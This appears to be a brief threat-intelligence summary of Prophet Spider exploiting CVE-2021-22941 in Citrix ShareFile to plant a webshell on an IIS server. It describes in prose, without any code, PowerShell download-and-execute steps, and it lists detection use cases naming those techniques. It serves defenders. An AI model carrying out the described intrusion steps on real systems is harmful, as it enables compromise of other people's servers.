Prophet Spider Exploits CVE-2021-22941
Prophet Spider exploits CVE-2021-22941
Industry: N/A | Level: Tactical | Source: CrowdStrike
CrowdStrike intelligence provides research of a recent attack by the threat group, Prophet Spider. The threat adversary exploited CVE-2021-22941 — a remote code execution (RCE) vulnerability impacting Citrix ShareFile Storage Zones Controller — to compromise a Microsoft Internet Information Services (IIS) web server. "From the exploit, the threat actors were able to upload a webshell to the IIS server." Following the exploitation, the attacker checked for connectivity using nslookup and utilized PowerShell with encoded and invoke-expression commands to download additional files. The threat group's preference for downloading and utilizing the "wget" utility has been observed in various operations.
- Anvilogic Scenario: Prophet Spider - Initial Setup Activity
- Anvilogic Use Cases:
- Web Application File Upload
- Common Reconnaissance Commands
- Common Application Security Testing Tools
- Encoded Powershell Command
- Executable File Written to Disk
- Invoke-WebRequest Command
- Invoke-Expression Command